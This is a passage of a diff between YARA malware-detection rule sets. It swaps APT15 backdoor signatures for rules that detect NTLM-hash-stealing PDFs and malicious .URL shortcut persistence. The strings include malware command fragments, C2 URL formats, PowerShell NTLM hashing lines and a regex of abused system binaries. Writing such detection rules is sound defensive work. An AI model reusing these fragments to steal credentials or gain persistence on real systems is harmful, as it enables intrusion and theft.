-		hash1 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
+		super_rule = 1
+		hash1 = "56c6012c36aa863663fe5536d8b7fe4c460565d456ce2277a883f10d78893c01"
+		hash2 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
+		hash3 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
 
 	strings:
-		$s1 = "\\Release\\RoyalCli.pdb" ascii
-		$s2 = "%snewcmd.exe" fullword ascii
-		$s3 = "Run cmd error %d" fullword ascii
-		$s4 = "%s~clitemp%08x.ini" fullword ascii
-		$s5 = "run file failed" fullword ascii
-		$s6 = "Cmd timeout %d" fullword ascii
-		$s7 = "2 %s  %d 0 %d" fullword ascii
+		$s1 = "$NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)" fullword ascii
+		$s2 = "$client_challenge = [String](1..8 | ForEach-Object {\"{0:X2}\" -f (Get-Random -Minimum 1 -Maximum 255)})" fullword ascii
+		$s3 = "$NTLM_hash_bytes = $NTLM_hash_bytes.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_APT15_Malware_Mar18_Royaldns : FILE
+rule SIGNATURE_BASE_SUSP_Bad_PDF : FILE
 {
 	meta:
-		description = "Detects malware from APT 15 report by NCC Group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c2f519db-2750-53ce-ae18-697ea041faaf"
-		date = "2018-03-10"
+		description = "Detects PDF that embeds code to steal NTLM hashes"
+		author = "Florian Roth (Nextron Systems), Markus Neis"
+		id = "149cf20c-4cfd-5b07-acc5-06ae25b209b1"
+		date = "2018-05-03"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HZ5XMN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L34-L59"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_bad_pdf.yar#L1-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d42f48d7d816c0b0ea05145e9dd43b1b2589f3131bf286e1b39c0efaf1c6fac"
-		score = 75
+		logic_hash = "59b159aaccf5c3b64fee17831c1e3a1ca99b60dbb725ad25a4ddad47cdc442d7"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
+		hash1 = "d8c502da8a2b8d1c67cb5d61428f273e989424f319cfe805541304bdb7b921a8"
 
 	strings:
-		$x1 = "del c:\\windows\\temp\\r.exe /f /q" fullword ascii
-		$x2 = "%s\\r.exe" fullword ascii
-		$s1 = "rights.dll" fullword ascii
-		$s2 = "\"%s\">>\"%s\"\\s.txt" fullword ascii
-		$s3 = "Nwsapagent" fullword ascii
-		$s4 = "%s\\r.bat" fullword ascii
-		$s5 = "%s\\s.txt" fullword ascii
-		$s6 = "runexe" fullword ascii
+		$s1 = "         /F (http//" ascii
+		$s2 = "        /F (\\\\\\\\" ascii
+		$s3 = "<</F (\\\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "RunInstallA" ) and pe.exports ( "RunUninstallA" ) ) or 1 of ( $x* ) or 2 of them )
+		( uint32( 0 ) == 0x46445025 or uint32( 0 ) == 0x4450250a ) and 1 of them
 }
-rule SIGNATURE_BASE_APT15_Malware_Mar18_BS2005 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Local_URL : FILE
 {
 	meta:
-		description = "Detects malware from APT 15 report by NCC Group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "700bbe14-d79e-5a35-aab3-31eacd5bd950"
-		date = "2018-03-10"
+		description = "Detects local script usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
+		id = "438d9323-cb6a-5f5d-af71-76692b93436a"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HZ5XMN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L61-L87"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "306903da4ecc9f5bf670d8c49039dee0ce5500c185acaef74786a2c109a4734b"
-		score = 75
+		logic_hash = "e95e5e97760d9b565184c588fdafe8408cdab61959aee5221485df53ef5f51d6"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "750d9eecd533f89b8aa13aeab173a1cf813b021b6824bc30e60f5db6fa7b950b"
 
 	strings:
-		$x1 = "AAAAKQAASCMAABi+AABnhEBj8vep7VRoAEPRWLweGc0/eiDrXGajJXRxbXsTXAcZAABK4QAAPWwAACzWAAByrg==" fullword ascii
-		$x2 = "AAAAKQAASCMAABi+AABnhKv3kXJJousn5YzkjGF46eE3G8ZGse4B9uoqJo8Q2oF0AABK4QAAPWwAACzWAAByrg==" fullword ascii
-		$a1 = "http://%s/content.html?id=%s" fullword ascii
-		$a2 = "http://%s/main.php?ssid=%s" fullword ascii
-		$a3 = "http://%s/webmail.php?id=%s" fullword ascii
-		$a9 = "http://%s/error.html?tab=%s" fullword ascii
-		$s1 = "%s\\~tmp.txt" fullword ascii
-		$s2 = "%s /C %s >>\"%s\" 2>&1" fullword ascii
-		$s3 = "DisableFirstRunCustomize" fullword ascii
+		$file = "URL=file:///" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
+		$file and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_APT15_Malware_Mar18_Msexchangetool : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_SMB_URL : FILE
 {
 	meta:
-		description = "Detects malware from APT 15 report by NCC Group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "81b826b6-8c2e-5a8a-a626-9515d40dbbb0"
-		date = "2018-03-10"
+		description = "Detects remote SMB path for .URL persistence"
+		author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
+		id = "e23609a1-9b18-5a56-92ee-c7f84c966865"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HZ5XMN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L89-L106"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L21-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4e9e29bc69383ab6248241622394afddde6e18032ed6e2b64575362773f25a94"
-		score = 75
+		hash = "e0bef7497fcb284edb0c65b59d511830"
+		logic_hash = "4903c8f4bb08e799f6787ad29cf7688f354f97a065bcd24c58d3ccd3778a6a15"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "16b868d1bef6be39f69b4e976595e7bd46b6c0595cf6bc482229dbb9e64f1bce"
 
 	strings:
-		$s1 = "\\Release\\EWSTEW.pdb" ascii
-		$s2 = "EWSTEW.exe" fullword wide
-		$s3 = "Microsoft.Exchange.WebServices.Data" fullword ascii
-		$s4 = "tmp.dat" fullword wide
-		$s6 = "/v or /t is null" fullword wide
+		$file = /URL=file:\/\/[a-z0-9]/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
+		$file and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Clean_Apt15_Patchedcmd : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Iconremote_Smborlocal : FILE
 {
 	meta:
-		description = "This is a patched CMD. This is the CMD that RoyalCli uses."
-		author = "Ahmed Zaki"
-		id = "c6867ad4-f7f2-5d63-bffd-07599ede635d"
-		date = "2018-03-12"
+		description = "This is the syntax used for NTLM hash stealing via Responder - https://www.securify.nl/nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html"
+		author = "@itsreallynick (Nick Carr)"
+		id = "9362ce46-265c-5215-bee1-3d784d0cb928"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L118-L131"
+		reference = "https://twitter.com/ItsReallyNick/status/1176241449148588032"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L61-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "90d1f65cfa51da07e040e066d4409dc8a48c1ab451542c894a623bc75c14bf8f"
-		logic_hash = "08a68e14793d2f44ee75e49a43521c7d8bc1fc5ddd005e1fb71cc844966e16ba"
-		score = 75
+		logic_hash = "8c49908c7f52ebcd512ff2dc8c40392767769130b9d39abb9d5fc9e130edb65c"
+		score = 50
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$ = "eisableCMD" wide
-		$ = "%WINDOWS_COPYRIGHT%" wide
-		$ = "Cmd.Exe" wide
-		$ = "Windows Command Processor" wide
+		$icon = "IconFile=file://" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Malware_Apt15_Royalcli_1 : FILE
+rule SIGNATURE_BASE_Methodology_Shortcut_Hotkey : FILE
 {
 	meta:
-		description = "Generic strings found in the Royal CLI tool"
-		author = "David Cannings"
-		id = "432c09bf-3c44-5a2c-ba69-7b4fe7eb43cc"
-		date = "2018-03-12"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "0ce377c4-db9b-59fa-987b-a77eaf408765"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L133-L152"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L80-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
-		logic_hash = "3cc0cd81db58e20fbf31fbd9fe65d113b7160e7d2b6739c01987d9e317099b9b"
-		score = 75
+		logic_hash = "a48f7c1125218ee89f58f1517e81150038a5d71889d847e7690b13c818b32fb5"
+		score = 50
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$ = "%s~clitemp%08x.tmp" fullword
-		$ = "%s /c %s>%s" fullword
-		$ = "%snewcmd.exe" fullword
-		$ = "%shkcmd.exe" fullword
-		$ = "%s~clitemp%08x.ini" fullword
-		$ = "myRObject" fullword
-		$ = "myWObject" fullword
-		$ = "2 %s  %d 0 %d\x0D\x0A"
-		$ = "2 %s  %d 1 %d\x0D\x0A"
-		$ = "%s file not exist" fullword
+		$hotkey = /[\x0a\x0d]HotKey=[1-9]/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		$hotkey and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Malware_Apt15_Royalcli_2 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Baseurlsyntax : FILE
 {
 	meta:
-		description = "APT15 RoyalCli backdoor"
-		author = "Nikolaos Pantazopoulos"
-		id = "d4acfd2d-385d-5063-898e-d339b50733eb"
-		date = "2018-03-12"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "cab7b573-d197-5afc-95a9-ef05a07c2b7a"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L154-L167"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L99-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c57ae92ba84355652cd56c8eaad3f277a8f514f8d078f053f3e8208b8bec535f"
-		score = 75
+		logic_hash = "4aa29bedb5689fe16c067f5ea933e56804085712c7469b138d8b658a30a7eb67"
+		score = 50
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$string1 = "%shkcmd.exe" fullword
-		$string2 = "myRObject" fullword
-		$string3 = "%snewcmd.exe" fullword
-		$string4 = "%s~clitemp%08x.tmp" fullword
-		$string6 = "myWObject" fullword
+		$baseurl1 = "BASEURL=file://" nocase
+		$baseurl2 = "[DEFAULT]" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		all of ( $baseurl* ) and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Malware_Apt15_Royaldll
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Iconnotfromexeordllorico : FILE
 {
 	meta:
-		description = "DLL implant, originally rights.dll and runs as a service"
-		author = "David Cannings"
-		id = "26baef92-1055-56dc-b274-e2a6bc05d85b"
-		date = "2018-03-12"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "82d0483f-48ee-5d0c-ba7d-73d9e9455423"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L196-L243"
+		reference = "https://twitter.com/ItsReallyNick/status/1176229087196696577"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L161-L179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
-		logic_hash = "2ed0d38993a072da189f02233bd7cc0bf1be02e926f687db224f52de9b3a44fc"
-		score = 75
+		logic_hash = "957fe9f24d08033cf6e29d7e202e04bfb579577d3850a99e97da6b70924ae88e"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$opcodes_jshash = { B8 A7 C6 67 4E 83 C1 02 BA 04 00 00 00 57 90 }
-		$opcodes_encode = { 0F B6 1C 03 8B 55 08 30 1C 17 47 3B 7D 0C }
-		$opcodes_sleep_loop = { 68 (88|B8) (13|0B) 00 00 FF D6 4F 75 F6 }
-		$ = "Nwsapagent" fullword
-		$ = "\"%s\">>\"%s\"\\s.txt"
-		$ = "myWObject" fullword
-		$ = "del c:\\windows\\temp\\r.exe /f /q"
-		$ = "del c:\\windows\\temp\\r.ini /f /q"
+		$icon = "IconFile="
+		$icon_negate = /[\x0a\x0d]IconFile=[^\x0d]*\.(dll|exe|ico)\x0d/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		3 of them
+		any of ( $url* ) and $icon and not $icon_negate and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-
-rule SIGNATURE_BASE_Malware_Apt15_Royaldll_2 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Evasion : FILE
 {
 	meta:
-		description = "DNS backdoor used by APT15"
-		author = "Ahmed Zaki"
-		id = "3bc546a5-38b9-5504-b09e-305ba7bbd6bc"
-		date = "2018-03-12"
+		description = "Non-standard .URLs and evasion"
+		author = "@itsreallynick (Nick Carr)"
+		id = "36df4252-2575-5efa-88ce-17e68a349306"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L245-L261"
+		reference = "https://twitter.com/DissectMalware/status/1176736510856634368"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L181-L198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
-		logic_hash = "94e2b61ff19b1377f461203cb22c607e718683691e54a3de3ed32bf6ed2897fa"
-		score = 75
+		logic_hash = "c4fafae6af3ed5cc2e83e30427107d1c42cc4bc86d5c6a60e26953a11847029f"
+		score = 50
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$ = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" wide ascii
-		$ = "netsvcs" wide ascii fullword
-		$ = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" wide ascii fullword
-		$ = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
-		$ = "myWObject" wide ascii
+		$URI = /[\x0a\x0d](IconFile|(Base|)URL)[^\x0d=]+/ nocase
+		$filetype_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$filetype_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and pe.exports ( "ServiceMain" ) and filesize > 50KB and filesize < 600KB
+		any of ( $filetype* ) and $URI and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Malware_Apt15_Exchange_Tool : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Lolcommand : FILE
 {
 	meta:
-		description = "This is a an exchange enumeration/hijacking tool used by an APT 15"
-		author = "Ahmed Zaki"
-		id = "f07b9537-0741-51c8-a9fa-836430fe4855"
-		date = "2018-03-12"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L263-L283"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "061e7919-17f1-5774-ad7d-fc964dc9a947"
+		date = "2019-09-27"
+		modified = "2021-02-14"
+		reference = "https://twitter.com/ItsReallyNick/status/1176601500069576704"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L201-L219"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d21a7e349e796064ce10f2f6ede31c71"
-		logic_hash = "e7b5ac97f3dcf125e64001be53aca73ee19c1be8b192a762f231106c47f76867"
-		score = 75
+		logic_hash = "4ac9a555e61303a173443de2a189536c8ea0fc32ee73c589dd104275c7967c57"
+		score = 50
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "subjectname" fullword
-		$s2 = "sendername" fullword
-		$s3 = "WebCredentials" fullword
-		$s4 = "ExchangeVersion" fullword
-		$s5 = "ExchangeCredentials" fullword
-		$s6 = "slfilename" fullword
-		$s7 = "EnumMail" fullword
-		$s8 = "EnumFolder" fullword
-		$s9 = "set_Credentials" fullword
-		$s18 = "/v or /t is null" wide
-		$s24 = "2013sp1" wide
+		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=[^\x0d]*(powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(\.exe|)[^\x0d]{2,50}\x0d/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Malware_Apt15_Generic
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Webdav : FILE
 {
 	meta:
-		description = "Find generic data potentially relating to AP15 tools"
-		author = "David Cannings"
-		id = "4eb50731-22df-5f7a-bf5f-166ef84cf8b5"
-		date = "2018-03-12"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "cd660b84-d7c6-52fc-9e1d-76450e5262b1"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L285-L307"
+		reference = "https://twitter.com/cglyer/status/1176243536754282497"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L222-L239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e939a5ab4a4b2b289d5809e18dd57dd85e3da19a176719adba4707dfd605fc81"
-		score = 75
+		logic_hash = "4fec084392140245eeb25bb512f3a4631ec6be08c197ec130a907fc118161197"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$str01 = "myWObject" fullword
-		$str02 = "myRObject" fullword
-		$opcodes01 = { 6A (02|03) 6A 00 6A 00 68 00 00 00 C0 50 FF 15 }
+		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=\s*\/\/[A-Za-z0-9]/
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		2 of them
+		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_APT_UNC1151_Windowsinstaller_Silent_Installproduct_Macromethod : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Scripturl : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Proofpoint Threat Research"
-		id = "9ae80d54-33b9-55d7-957f-0738243e089f"
-		date = "2021-07-28"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "2f55f8a9-4e4b-5480-9042-da6bb66b2e06"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "Thttps://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc1151_ua.yar#L1-L16"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L241-L259"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aec1bb992061fdf1abf5c1a61cf9ec9e54c1f13be36ceb84890b058ade273b70"
-		score = 75
+		logic_hash = "ece0013dbc9836fa800f99a10ab46c1eb081e1c04fe45fe17be26ffac1d464e9"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		hash1 = "1561ece482c78a2d587b66c8eaf211e806ff438e506fcef8f14ae367db82d9b3"
-		hash2 = "a8fd0a5de66fa39056c0ddf2ec74ccd38b2ede147afa602aba00a3f0b55a88e0"
 
 	strings:
-		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
-		$s1 = ".UILevel = 2"
-		$s2 = "CreateObject(\"WindowsInstaller.Installer\")"
-		$s3 = ".InstallProduct \"http"
+		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=[^\x0d]*script:/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		$doc_header at 0 and all of ( $s* )
+		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Enigmapacker_Rare : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Workingdirremote_HTTP : FILE
 {
 	meta:
-		description = "Detects an ENIGMA packed executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "748bc74c-e83f-5740-8ff7-f1371fc22802"
-		date = "2017-04-27"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "68e54f8a-11e4-59e4-8498-59d88e70e438"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_enigma_protector.yar#L8-L23"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L261-L278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a001b563db1b75581432d42a435683f24e244b6b354f83409b5b9d6d0314d63a"
-		score = 60
+		logic_hash = "c7c23c1253bf089519dec5f141f486425c6804640d9bffac9ce4c986ce25d323"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "77be6e80a4cfecaf50d94ee35ddc786ba1374f9fe50546f1a3382883cb14cec9"
 
 	strings:
-		$s1 = "P.rel$oc$" fullword ascii
